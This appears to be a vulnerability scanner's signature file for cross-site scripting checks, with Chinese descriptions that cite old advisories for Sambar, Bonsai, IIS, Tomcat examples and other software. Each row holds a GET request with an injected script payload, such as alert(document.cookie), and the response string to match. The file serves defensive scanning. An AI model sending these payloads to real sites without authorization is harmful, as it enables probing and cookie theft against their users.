3229#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRSenviron.pl?param1=<script>alert(document.cookie)</script>#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#Sambar Server的默认脚本存在跨站脚本攻击漏洞（XSS）。请参考 CA-2000-20 。#d9Fa0j#
3251#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRScvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#Bonsai 存在跨站脚本攻击漏洞（XSS）。请参考 CA-2000-02 。#d9Fa0j#
3254#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRScvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#Bonsai 存在跨站脚本攻击漏洞（XSS）。请参考 CA-2000-02 。#d9Fa0j#
3255#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRScvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#Bonsai 存在跨站脚本攻击漏洞（XSS）。请参考 CA-2000-02 。#d9Fa0j#
3258#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRScvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#Bonsai 存在跨站脚本攻击漏洞（XSS）。请参考 CA-2000-02 。#d9Fa0j#
3259#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRScvslog.cgi?file=<script>alert('Vulnerable')</script>#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#Bonsai 存在跨站脚本攻击漏洞（XSS）。请参考 CA-2000-02 。#d9Fa0j#
3261#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRScvsblame.cgi?file=<script>alert('Vulnerable')</script>#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#Bonsai 存在跨站脚本攻击漏洞（XSS）。请参考 CA-2000-02 。#d9Fa0j#
3263#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRSshowcheckins.cgi?person=<script>alert('Vulnerable')</script>#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#Bonsai 存在跨站脚本攻击漏洞（XSS）。请参考 CA-2000-02 。#d9Fa0j#
3327#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#@CGIDIRSstore/agora.cgi?cart_id=<script>alert('Vulnerable')</script>#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#Agora.cgi 存在跨站脚本攻击漏洞（XSS），请参考CVE-2001-1199, CA-2000-02 。#d9Fa0j#
3349#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/?\><script>alert('Vulnerable');</script>"#d9Fa0j#GET#d9Fa0j#<script>alert('Vulnerable')</script>#d9Fa0j#IIS 存在跨站脚本攻击漏洞（XSS）。请参见 MS02-018, CVE-2002-0075, SNS-49, CA-2002-09 。#d9Fa0j#
3386#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/shopadmin.asp?Password=abc&UserName=\><script>alert(foo)</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(foo)</script>#d9Fa0j#VP-ASP Shopping Cart 5.50的shopadmin.asp 存在用户名变量跨站脚本攻击（XSS）。#d9Fa0j#
3473#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/rpc.php?q=\><script>alert(document.cookie)</script>"#d9Fa0j#GET#d9Fa0j#<script>alert(document.cookie)</script>#d9Fa0j#Unobtrusive Ajax Star Rating Bars 是脆弱的变量，XSS攻击可以实现。#d9Fa0j#
3570#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/jsp-examples/jsp2/jspx/textRotate.jspx?name=<script>alert('133')</script>#d9Fa0j#GET#d9Fa0j#<script>alert('133')</script>#d9Fa0j#tomcat的安装演示文件存在，它很容易受到XSS攻击。#d9Fa0j#
3571#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/jsp-examples/jsp2/el/implicit-objects.jsp?foo=<script>alert('133')</script>#d9Fa0j#GET#d9Fa0j#<script>alert('133')</script>#d9Fa0j#tomcat的安装演示文件存在，它很容易受到XSS攻击。#d9Fa0j#
3572#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/jsp-examples/jsp2/el/functions.jsp?foo=<script>alert('133')</script>#d9Fa0j#GET#d9Fa0j#<script>alert('133')</script>#d9Fa0j#tomcat的安装演示文件存在，它很容易受到XSS攻击。#d9Fa0j#
16240#d9Fa0j#MED#d9Fa0j#XSS跨站脚本#d9Fa0j#/<script>alert('can+cross+site+attack')</script>/#d9Fa0j#GET#d9Fa0j#403#d9Fa0j#发现可利用目录信息泄露#d9Fa0j#